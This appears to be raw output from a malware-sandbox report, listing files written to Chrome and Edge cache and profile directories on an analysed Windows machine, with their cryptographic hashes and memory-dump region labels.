SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

memory/1508-726-0x00007FF7239B0000-0x00007FF724BD6000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Crashpad\settings.dat

MD5 98fa3f2150a5f5ee4beb6ba2d3b2bed6
SHA1 c52b48e53d61b36972eff716074f7aa925988fb7
SHA256 af594b544328c089c5a95e232bae36ec6d1953af518f9a5969285454fa81861c
SHA512 f31a4a2d063b7948b50f294b2f496bce5bb9ce007b806dca2225195f93e4b545afcb948d096d4dda16360f94ec51a4850440eb1f5a17703226e71606f9ec7c5a

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\chrome_debug.log

MD5 69dc8fa435a3c82583b6e979b5fde4b5
SHA1 9e9bc6ddb885e9e0ca091c560de9aef1a77b1ca4
SHA256 d6dfbfbba61ecb5a81130febbeae4580cbd7b3c95e9d963bf2a48ee66bad7cfa
SHA512 399b1fa4e6a7a43fab1ca8780efa3e5c951acf833a52bb9cc7a7d6325cef1b93f77c09e2b1650de6b719a91ca99bb73bff6fb8e9169140ec02ceccc8b5cf7749

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\DevToolsActivePort

MD5 8c4692e4b42d9920a9bf327f9c6d5117
SHA1 c6008495182985885ed21a0f79d8417f19395326
SHA256 92622eb3b17272f850c8dad0922d024333bc51f7a08e09255935a4d43bce557f
SHA512 77d77274ea35ba03fe12abf2f88599530d4f862dca1ed7c5e56f00609701efc6765fa4a4c39dd3dff5d03b11baf600ff616871d6f70ce83c5205f3c0bf99ba0e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\data_0

MD5 49d11d652a15a3d779ecd380d1c26a9d
SHA1 b13e298bec883efb3eaaa7bf7d8f847c18d9bb60
SHA256 b061c11a9a657f2ecc61ec4840124f18788a4b1465407bf0a55217ed11649bc5
SHA512 5c75a6d416202f82635bac3e4d95078f0b73e0461324cab673fb85109b3eff077c3b2004a5285f731ecf32a388767538cdf7053a8e0709b6cbe47b0257b644c8

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\data_1

MD5 24e7ec68d55ab13ef2161a1ced35e2c6
SHA1 7abf8eda25288176432bf6b8d69787bb7391891a
SHA256 3d590e67030a33e842b760a8d9dffc21dc389b7e56d1d9b89c4b06bc1819744f
SHA512 5d14a35bb1c7e166dc9534bf569a116488a3c051aa6329dac5682b6bc5c1d61a9d2bc0f5192a5ffbb43e27b8412b83e91901879c58750855780f4da858c7342a

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\data_2

MD5 03d3dc1e7509931fd14aa2afc5944273
SHA1 1f932559eea13b0c07b2f3612ec6c1b4e254e49c
SHA256 21a3d2283bb4673d292c22ff1b29a4c378310ddeebb63d0eb9267be0a43e26a0
SHA512 0057c74170787b00d8efeea8bf6f63a735016b02a128441e0d425db8d602956fe57a9753a8a312d9ab2cb5ab416f231d1e960ae22d3756f008e88b405c706a21

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\data_3

MD5 2ace782056ae5e8d553a9c1c3a79ffde
SHA1 d95248df23904ceff133c0e615e83193e9965845
SHA256 8d16e01c5422312f70a0a39a9abacaa68818cf6f479c37606f3197dfc06ca38f
SHA512 9e3dd3df7e48bd976a3137207b122f5867f4c5e873557f5f5c625552b5b93e0c67ec6176171767419ff35f0b393d5f6b0b1eede3e2252b0697f8ae42a244e743

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000001

MD5 d5f8b619bfde6861fd861c5cb31f573d
SHA1 524c053e7cf5949781a2ab307b194a2d94b183f0
SHA256 506e50e0607fbf547b08a20db4bbd1b27f6cedba24995daad4e55143e9d3fe79
SHA512 b7b58e11f7d377c1b80bacae55d0e96eb8369d473f345d87e294d8b8d95126d6cd312bcf5afb0e7fb6c4973d9e15d5227006af6b625ddc7eddbbd5695cb8de89

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_00000a

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
SHA1 68f598c84936c9720c5ffd6685294f5c94000dff
SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000009

MD5 c101a8ba729b894927d7d884e4be68a8
SHA1 4bf48f94ff4e50e81c9d83b641af74b3bed580a0
SHA256 544f08482a62485be4acbc443462b01fe16b408b3d154c0cb1ff921a453cee33
SHA512 77483a92abeed799dfb1e782988569875b29eccebfb14e5be353302849ea6f0ac6a6411a72d6da706ec3767a54f12907fd0bfa4646ad4ca1cf4e1e15fbe9a9ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000008

MD5 9f1c899a371951195b4dedabf8fc4588
SHA1 7abeeee04287a2633f5d2fa32d09c4c12e76051b
SHA256 ba60b39bc10f6abd7f7a3a2a9bae5c83a0a6f7787e60115d0e8b4e17578c35f7
SHA512 86e75284beaff4727fae0a46bd8c3a8b4a7c95eceaf45845d5c3c2806139d739c983205b9163e515f6158aa7c3c901554109c92a7acc2c0077b1d22c003dba54

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000007

MD5 6a3bb9c5ba28ee73af6c1b53e281b0cf
SHA1 d96e403c99c1707f82ea29c2c1f134e792c64097
SHA256 2f5adfc38558162578ffe112229f10417fbc4b3df025d153d4e22a0c95177740
SHA512 6c4844f70969938339cb6716a834a79e1a8379459c87b983c2518b9cbb560cb2f101aff980f682989928523be6cdc99bde3bfd8137f9c54a58191b900b580fbf

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000006

MD5 5236a1c2653afc1522e249b922a5332d
SHA1 a36fcdb48c7c28dd1289d6a42fe253b1c3c46d68
SHA256 70ccf1cc02afa1a8c54f64088e767397798d899c559682fca821799671393a22
SHA512 95229004b79fd571a34dd3d1eaca523b648d8f17b8cb07dc7d5d6baa6f7c5a964eb396584bbe698dbe22f5afde29bc64afde544cb142686c2d05957d48273987

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000005

MD5 d3f60c28d769a4654c5d775e4cee7e0f
SHA1 45c058d9579ff0e8dcafac8fbdc1fd81992ab2d4
SHA256 af8fad3113b9a1ff182a631c753fd4f301a6005e6c17973bbbd1b17727701dc8
SHA512 777baf3a6e8d737143e3560e36334c54a165c4568bfecf5be17755bd1eeb85ce035bdc4531bd2f25fdfbe10766040361f63f3057ed0745401f8712fbbd05c2aa

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000004

MD5 21808cd0724524589cd4ec1ce26f6d58
SHA1 fc5cc4cb347ed20389626c58a6de396ef1ac5ada
SHA256 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d
SHA512 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000003

MD5 17eda5d2659e183d4db8861f570d3810
SHA1 66427ee2560bd02afeae11be6daae99d6e4243ea
SHA256 e759fce16f087abf8de9a06095cf0acfcd792a8db706414cf2b3d3c80dd7beef
SHA512 35cbbc2e3db22e350f197b9a0b4ccb92790bbe4ae5821317797b4796e8808f660b266a9ce74b109f424311bab3c38481839b8bde5988d5bcaf350fbfd2a02379

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000002

MD5 6da5668a45351c7da842c6c9de0c5361
SHA1 17b944af56a4a88262b22371df0dfe8bbc496833
SHA256 12ff5424ed41291c2351d4a23e115efb10cf5189a1e4e1addf5743ea4f37faca
SHA512 30fb4ab20d18640e45ed1bafa30fcc0c8a5c0cdc0b08cdca93feae12c405d7d0de181e535fee1c2fe31fc15a93c9d1c442320667f0a4a902be4828024645c482

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Code Cache\js\343f6993e27f1d39_0

MD5 32a97ed74df8cd53b22766d360c41f03
SHA1 ee3544bd940ba1cb521eb097efae2950d4decdc4
SHA256 f27d632829bd3e8cc7aa6367c7520fc07ed6a9fd41c802b8a979e4ec12c1f9bc
SHA512 d2270bebb140eecf7ffb780c729f42511d7eacb93ee781117ae90b0611d465a9a6c5fb5fd363cd423b0ba946d157c93f87470e5a103d9f95997df5969b25ef5d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Code Cache\js\2e64514b9cd267ab_0

MD5 1256568ea18aee91e2de3f8dadfbff51
SHA1 a4e6ebae64067e5e9c0be71de492093b26de8879
SHA256 af66713278359cc39e41427b01df2eb525297e73dac038c00c885c6eb4ef271e
SHA512 cca7d48765a328b6518ecac200889a31b1069cdc133f06afa2094a1d47d42cc14877996b76a169f1f8d111e94ddb4e9946a3d3be568f0be04940d3aa13dc8e3a

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Code Cache\js\17e99028d152eccd_0

MD5 f02a41da661472e441b81f808a3285ed
SHA1 01539d5f652c5601c363636f8ff7c8d1669e7f2b
SHA256 0e40f144fae2c75a84771b9922dd32195b504ae125db9e1291ed5e671edb68a2
SHA512 79cbc4246d879aaa75528f05663c7a4ca270567f34743f88dd0218a5bbc398dcebe10303b7172c8b3aba08a5f6aa03eb227a407c1b7f257612a2b912e7668455

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Code Cache\js\06db5837b6c74111_0

MD5 a5bb71d5ac19739bb7814878e324cf58
SHA1 a36abe559c0fcb02b51693f3bba40fdb16951738
SHA256 945c158f160d29f5f103cc17070f07c25bc8b01a241d958579898bfd053ffae4
SHA512 5a06c78bfe850904f917703738d37b35c197fa7dd754fbe8e1f9f336a26ad127d160667d4d18c5334974c101081d0db29f50133a1b2425f816afe609524a9f5a

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Code Cache\js\056093a36a95204b_0

MD5 5199cecc2891f7eb5c35d6b9f1a04c96
SHA1 ae45538d4980840112dfecb14e811e3e4a60914f
SHA256 ba3afa6499c1445089f8210b64e4f1974d175e359e489f81329d53475e80c93b
SHA512 b7d721c3f6f7ae63fa1993653a6046ccbe0dccb95d370d26c748d0b1e90b9efb2c1b65a0a849934507de51f49187a742c2b35d7f1205bb49d5dc5d474c45e38b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\index

MD5 ec5b5ca24e3220eed9dc38f132a2e465
SHA1 26c11d901c344e65a0838f3df4832cf7c1ba6adf
SHA256 d1e93048f2c8ebf8d969f436b85cf52a723f06859b963514568327f9c40d03ce
SHA512 bd81a3f635dd713d7c41bb734a59b680018abeda3c3071cb3f5a842295e6f59b5ee7a7929e1dcb34a1664cb57a712020d434b2db2f1b9c8ea64786a4b2bee30b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000015

MD5 09fcf372ae90d5a60679f8ae4f3470de
SHA1 148f90f27a8af4cf63dc6bc9e4642e21ab30d4ea
SHA256 574658e831ce78fb5a714b44b8dac9a0733886c3c4d15bf84da893a1d21ea49a
SHA512 aea96835a5a8e66b43ff112ea9c3054ad9db01875d5df8a613044d9299d51d3dc399d335633440e23f4dfd5c07d9f9c2398d8311fbe38e71c55d8b1605d8a400

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000014

MD5 f88677e29b54dd5db296c326af6a4d9d
SHA1 1de3f597acaaf196e878c566c84dc27ada095d0a
SHA256 cad8566d3569c9df8104ca1a2f7a707fad71762f77cc34b009eee7ad753ab29e
SHA512 92d6c7bd43c437c596096e61b34a04799c82c0f79ab208ea04bf652faec038bde6c363686c6c973158b1048c81ed979874b369379d02e8e5e8ef9a94c354368c

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000013

MD5 871f7ecfcc9407aaaf179e917aa66306
SHA1 876298a6ca7cd90dace253636a70d1078a967140
SHA256 c0007603181a3cfcddbabde97699835d028309ebfd7ad2dfd528b6e24305ca7e
SHA512 64446cd7647fa751a28e327f05b30549a2d846dd0a6da0c60f98a2ca62db7e8dc0567b0a0b5dd61f38737515b4119ad02ba81b58512aed09a990085b5ac888f5

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000012

MD5 79b9a3fa2b9659e042b021c7b5e2129b
SHA1 0608194000a372f4388a1910f388c1c0b7fb38da
SHA256 49e21d3a2743c40a16e5610bf6a1e0ce1a43c28f392ce741858f88cc17df736b
SHA512 a10f34b2890a46924ba2ed95522540ae1dc94051ab945dc471610b05dccb9991a0770cdcc256ca7012c58980c3cc2c671091d26b97cd65e454b514db6779ed8d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000011

MD5 4fa74969dad84db849ab5effd5b0c6da
SHA1 e7a50d8643b90d0ac2b6159b249bd9c8b3163cc6
SHA256 70116c1df645fff28c254727d01019954a046d24a1e0bb95861a003627a6ee05
SHA512 b79e02b6b856f59255da95202d4df84c701adf2b44f991959dc70b90f416311ab6bdce918247ce04f2d2763155d9124083125dd102a2c604b66816d14026d217

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000010

MD5 9c4150890d48126e9e22f45e046199a4
SHA1 abc1a73a27ab8c98389d40457795702a404dff05
SHA256 e2b711c03d6e9dd4595cb09134cd844b9339cdb82234c4aa300e3415c8195da3
SHA512 a568a1aff7b522b5a059065d54c8d68bbddd7cdc106b0f19915e2c804c6d750f92e3ffacd5509e87daa0b8413c7d1428cc344d8c8712ea3ea479e9a0897e7af7

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_00000f

MD5 789fd4f17cc11ac527dc82ac561b3220
SHA1 83ac8d0ad8661ab3e03844916a339833169fa777
SHA256 5459e6f01b7edde5f425c21808de129b69470ee3099284cb3f9413d835903739
SHA512 742d95bb65dcc72d7ce7056bd4d6f55e2811e98f7a3df6f1b7daef946043183714a8a3049b12a0be8ac21d0b4f6e38f7269960e57b006dfec306158d5a373e78

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_00000e

MD5 189badc72a668aade50699ae05067c2a
SHA1 5458410fc96bcf08b29f204b05470dad5882afb9
SHA256 896d76b06fe7bc62fa10e8f9091b84584d8fdbd7eaaea1183f7c1e5e3a98c559
SHA512 287ff71f9b6ab261f989792cfee0b99e1745c57e8e8c9c3c55e07592a835008673a9ee5b2099ef9beb6ef4343c10827109b281b2fbed0fe0de1da020723c622b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_00000d

MD5 250bdff8769a9791656b1475a293c486
SHA1 31ccb16008e78db499d1cc68cff74ebf1979f1a1
SHA256 aca7dc1db7b861fa7c839ae3c537ed48b098ffedc1151c0fb95e744af1cb7738
SHA512 ba37f07adc32644e34700559f11a654a7862787ab1bb5bd53040c42b16a80f336823dca61e202a07130ad0845335b2d92b404567eded9619b4569d1b544ebcf2

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_00000c

MD5 2d52125a96fb5a7227c67848bc18f65c
SHA1 a3593c6d8e3b6b458b6bbc2c6423dc76e30a84a3
SHA256 61f3154c19e46e1989d6fadbfe20835d0c9fc47242dc5828e776e3ec667fda24
SHA512 5f151708007cb474e64e8968b1f6b5e5331c434cc237627c6c5c92d1894d020f476ad88461e35fbf383aa46750a9cdcaf3a2ac8fe90570753c73fcf17ac0cbe6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_00000b

MD5 f67dde285de5f831537c104e505e2f05
SHA1 9c967dd7e4b45de90af20983e78cbd315f7cc700
SHA256 918122ce975ea0a50f0da079028f0a059129d7fad0aeb7a4a52a13640a80dcae
SHA512 2762d03ab4e317fc1c08077ecf08e4c8f05be73abd18c441b2e4480b4b177c13f51056fce403997b9337739a1a180d114ddcd223109af815e38e046b9baa7845

memory/1508-816-0x00007FFAEB4B0000-0x00007FFAEB6A5000-memory.dmp

memory/32-845-0x00007FFAC9840000-0x00007FFACA301000-memory.dmp

memory/32-846-0x0000022EE8500000-0x0000022EE8510000-memory.dmp

memory/32-847-0x0000022EE8500000-0x0000022EE8510000-memory.dmp

memory/32-867-0x0000022EE88A0000-0x0000022EE88BC000-memory.dmp

memory/32-869-0x00007FF479DC0000-0x00007FF479DD0000-memory.dmp

memory/32-870-0x0000022EE8880000-0x0000022EE888A000-memory.dmp

memory/32-876-0x0000022EE8AE0000-0x0000022EE8AFC000-memory.dmp

memory/2772-924-0x0000000002660000-0x0000000002696000-memory.dmp

memory/2772-926-0x00000000747E0000-0x0000000074F90000-memory.dmp

memory/2772-929-0x0000000004C60000-0x0000000004C70000-memory.dmp

memory/32-931-0x0000022EE8890000-0x0000022EE889A000-memory.dmp

memory/2772-933-0x00000000052A0000-0x00000000058C8000-memory.dmp

memory/2772-934-0x00000000058D0000-0x0000000005936000-memory.dmp

memory/32-940-0x0000022EE8B00000-0x0000022EE8B1A000-memory.dmp

memory/32-946-0x0000022EE8AC0000-0x0000022EE8AC8000-memory.dmp

memory/32-952-0x0000022EE8AD0000-0x0000022EE8AD6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Cache\f_000002

MD5 21808cd0724524589cd4ec1ce26f6d58
SHA1 fc5cc4cb347ed20389626c58a6de396ef1ac5ada
SHA256 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d
SHA512 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Cache\f_000004

MD5 33aaf29d062b2bffb13f1e1847ac06ad
SHA1 97c88abc33d6de7611f3ed1d9f774072ad61ec36
SHA256 dd8232da1fdc726aa31755cbf585d79cbfa7a93955c82a768cefc8b722fb3490
SHA512 8c93ebd1a8aacc96fd6f896993d18f2df86a5b881dbc423d389f430f8686c9b728f8d12d54487bab916e37127fea82572d91eec7546d070917b56359e0ab47f9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Cache\f_000008

MD5 e905d749d610e52b8f228c949e3ee5a1
SHA1 af8549159a62dde03f7885bcd18a45cf82d199d8
SHA256 fbe26dab38951560b96de0f13bb1f286e3cb513e0d2c0212b42c328b83683dcf
SHA512 776ed3a6f11b1fb8fe208299f4c9cc608e16e342d75aa7dc8d8f235d7a01fd92540acd93978605d7952f7ac69eadd1230b63a5ea153e5bcee1bf4414c1667dc6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 9f4b9de88b64c212e26f4e2b345dadf4
SHA1 82ce91114d986ec8d2d8cf4d65d331743aa73850
SHA256 4beb35c2889713ee477150bf49f894d70ad69b3f233a3fc62750650fad68a457
SHA512 1b03b686afda5a0474e2f635102289ab1138c8daa09a4940e95d2feca45214d08f2342e7ef06d3199f6725f4cf870e2071bfd8430eb279c4e071519b96ad6bfa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe58c668.TMP

MD5 20b061fef6222dcbdbfc73671a938a0b
SHA1 bb09557d5136c7c84d3ed3025bfdd2539d7a57ef
SHA256 e6f8ff0c0f404dd679b31a5fd785f3431595f5131713315766a480eb6b0eeaf1
SHA512 e4b95771e0983187ec6c6714718b9dde130b1c249cef679a2d845439473dd2b7b32df690ccbc15cae7bf1b1720a6e526981a49345e9610aa08fae8a71e33206e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\MANIFEST-000001

MD5 3fd11ff447c1ee23538dc4d9724427a3
SHA1 1335e6f71cc4e3cf7025233523b4760f8893e9c9
SHA256 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
SHA512 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 faedf2f1b9fd85cb8042fc23687cc824
SHA1 aa3e0fcf78d16361e1ce63d06a8fedfb37242c5c
SHA256 cc4a0e570eb37e942ed02e5a353dae0cf4e38fdc38ad5fe6c30d1edff89ea683
SHA512 4c44d444681028401dc2f7b0de9ccb99fcd0fff16623da530dac43b1cb5d1010c39c01c5b58a91642dd2afb7532afd9be73e586ba560c88b5ffa8ed50fb049d1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 bceb0f4394bd527e19782eb328c0afa4
SHA1 f6ca11a15c1a6aba576ee0fc08416e34c8cb5c35
SHA256 7635b3e3c04363b65fe514b2b791bfe17292b6d540793c1f578b77224874ba0d
SHA512 82d4b78a1b2ebea285aade5903565a3c2f590bf4fd751d291dab52355f7b4a9c4399874949c360bc333efa98935bd5532c39d52f1dcb04f14a9ebd9f90639f5e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Code Cache\js\index-dir\the-real-index

MD5 a751b3be94c078a200cebe80ba18adb2
SHA1 dafe464b664a1d509a5de2fa148d2bd9695cc9f8
SHA256 7e9d08b1c46dd2ea8bd9c9c8f3a3ef079756ee0c1dd82c5473fa984334e9dd2c
SHA512 a5887fb795a474f9251041f9b51292e93b5a488706575118f434aecfe6012ef06753d80c2371efd69852fa48c83a399709e0eaa5faacc74ef2cac935e754c717

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 b0eda4be488cd48548d0f0b2db0cd0ab
SHA1 df0526523eeeabdaae51224450451b6329db8507
SHA256 14c9a121457eda580ad0b3b06c0ed76db5ec1f86961b4c30314612e0e99160dc
SHA512 47c7572e259c490f004a487161d0bce2d0bf351ca9e91815b1f31412be74cb2ead93af2f7ceb185670c02a7e7aa757bbb7f011a1e2f06c9c6785f27edf6b2a73

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 07e98b0f9f311ba341ba9e84ba41ba17
SHA1 1ae5be32471821dbaeca32534fb331042472f902
SHA256 59bb91c83fc0789991efa5683934cf70402e790f95a73b368137607355a0b30a
SHA512 830c512f85fb38b0fd1a5073d60ec3e2ba48eb53806f0dd7f7764616a445d4988686116d3584c9dd7e571ff1a658a5c04de802568a9dedfee2fe0a5e5853d79f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\26aa1d27-0b49-4ff7-9c03-c6aa7002fe9f\index-dir\the-real-index

MD5 d5904448a1d2acfbfc726ad40c781399
SHA1 939733cd85cc604198c19f64d2674a483a3f90d5
SHA256 2fb54de98e08562402609c87bcb7cf3d29bba2cf99d7cf5583c22b3c65ac2454
SHA512 e7e1888db9c3a929477ace7d81f312b46f9c6acb5c49a367fa6db2b165034060c23e877524b3b1220c54972d56bebcec08b53559cd62a3b6745720ba1d3f919b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\26aa1d27-0b49-4ff7-9c03-c6aa7002fe9f\index-dir\the-real-index~RFe58d174.TMP

MD5 9ea4fe8a3ea3ab2c2791cbbdc672e0e4
SHA1 e356190ef21446410d104ebe7099f7dcbe09100d
SHA256 3686ae7ad1c81495bcf4d106dfc7486f4e3e932f7bc638c2965d80571d6699d5
SHA512 68e4f53e810fe57c0a55d26176092b1341108e13969d79f1461d80b6dfeacdca84d99da2d81a6a16f7fd7393ec3a41f87bde62eeba23eecb3405fd82ae1e030d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58d174.TMP

MD5 1d4b2ca7f3f999524ee6330d4189c687
SHA1 c4b496e9b38a7a0b616844bbe19e549f6e099d55
SHA256 1d3a7fda9d1cf5e38d7fb802d901d734bcc57e1ad3606b009d4ef8782fd7e1a5
SHA512 0ab441aa2c06d13632309786918309cdfe0ce76dfb3cb357a29e7ca79bd15d92860bc3dd634fc12c357d5135f13c7d091c2d08bb1ebf95c38686570a3739b8ce

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Code Cache\js\index-dir\the-real-index

MD5 506db96e96fd6fb07a93ae76eae1399e
SHA1 3697661fa0970ba8db0fc54f91581d0bb6b4c88b
SHA256 435b821c9b94c0f3e20165352e1e4309c808b2d3d27433dd16fb15541207402e
SHA512 ef806b9733ba5549cd796706e8eb21643717f0c02d193a6151aa4f01354266a6a94e902ab051cf50de4c7fab65813944af252695113e88d1db72ec45bd242902

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\6fca92e5-6899-405b-9f51-d0495f2c4c72\index-dir\the-real-index

MD5 8be9d3a797fe07972e0be85fe35617e5
SHA1 9fac6d9aa1fdd3ab49c1c84bb722ffe0e69559d5
SHA256 510ad7e384ff2aef1fb62bc9ffcfcc1bcdab8508e1f4748d388eae0b3d3527d8
SHA512 2fa82906628ee00db6aa6a4b643fbd41f88fa9dc783ba3cbfa80e6016c5ab21b5a680db3ec8ac8ff8b8b6ea6b4670f0cc4eba6b8d49b7d285658c2cca0477db2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\6fca92e5-6899-405b-9f51-d0495f2c4c72\index-dir\the-real-index~RFe58d174.TMP

MD5 de946ec9b77704eecc2e14f660712969
SHA1 dc57d658dee581139d27852099ebbca5493ed226
SHA256 0394908513a710607193d13fb62de215e738340449f050c39845cbb348945f0f
SHA512 710e735dd93ae3c02a66cc069f602b87cf82cb445a25c18a9b04834fe8c8826d91c3608aa83016fe2a5c37b5ecb7b61eeb29dec21a01fef7edae5ab8abae0f5c